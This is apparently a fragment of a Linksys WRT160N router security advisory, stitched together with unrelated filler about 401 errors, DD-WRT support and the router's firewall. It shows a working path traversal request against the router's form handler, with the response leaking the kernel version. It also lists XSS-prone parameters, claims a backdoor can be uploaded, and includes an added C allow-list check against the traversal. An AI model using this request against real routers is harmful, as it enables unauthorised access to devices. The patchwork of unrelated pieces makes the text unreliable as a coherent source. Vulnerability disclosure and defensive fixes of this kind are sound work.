Request:
POST /HTTP/1.1
Host: 192.168.178.233
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: Basic XXXXX=
Content-Type: application/x-www-form-urlencoded
Content-Length: 77

submit_type=wsc_method2&change_action=gozila_cgi&next_page=../../proc/version

Response:
HTTP/1.1 200 Ok
Server: httpd
Date: Thu, GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/html
Connection: close

Linux version 2.4.30 ([email protected]) (gcc version 3.3.6) #9 Fri Aug 21 CST 2009

XSS
Injecting scripts into the parameters ddns_enable, need_reboot, ping_ip and ping_size reveals that these parameters are not properly validated for malicious input.
You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.
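A server-side check that would reject the next_page value from the request above, as an added example (not code from the advisory or from the router firmware). The function names and the page names in the allow-list are hypothetical.

```c
#include <ctype.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical allow-list of pages the form handler may hand back. */
static const char *const ALLOWED_PAGES[] = { "index.asp", "ddns.asp", "ping.asp" };

/* Decode '+' and %XX from an x-www-form-urlencoded value.
 * Returns -1 on malformed escapes, on %00, or if out is too small. */
static int form_decode(const char *in, char *out, size_t outsz)
{
    size_t o = 0;
    for (; *in != '\0'; in++) {
        int c = (unsigned char)*in;
        if (c == '+') {
            c = ' ';
        } else if (c == '%') {
            if (!isxdigit((unsigned char)in[1]) || !isxdigit((unsigned char)in[2]))
                return -1;
            char hex[3] = { in[1], in[2], '\0' };
            c = (int)strtol(hex, NULL, 16);
            if (c == 0)
                return -1;          /* an embedded NUL would truncate the path */
            in += 2;
        }
        if (o + 1 >= outsz)
            return -1;
        out[o++] = (char)c;
    }
    out[o] = '\0';
    return 0;
}

/* Returns 1 only if the decoded value is exactly one allow-listed page name. */
int next_page_is_allowed(const char *raw)
{
    char page[64];
    if (raw == NULL || form_decode(raw, page, sizeof page) != 0)
        return 0;
    /* Defence in depth: no path separators or parent references at all. */
    if (strchr(page, '/') || strchr(page, '\\') || strstr(page, ".."))
        return 0;
    for (size_t i = 0; i < sizeof ALLOWED_PAGES / sizeof ALLOWED_PAGES[0]; i++)
        if (strcmp(page, ALLOWED_PAGES[i]) == 0)
            return 1;
    return 0;
}
```

The check runs on the decoded value, so an encoded form of the same path is rejected the same way as the literal ../../proc/version.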
It is possible to upload and execute a backdoor to compromise the device.

The 401 Unauthorized error displays inside the Internet browser window, just as web pages do. The 401 Unauthorized error is an HTTP status code that means the page you were trying to access cannot be loaded until you first log in with a valid user ID and password.

Now I read here, that the WRT160N v2 is not supported by DD-WRT. I think it is not too expensive and it seems to be a good working item.

Linksys WRT160N routers include a very basic firewall that helps protect your home network from unwanted access from the internet.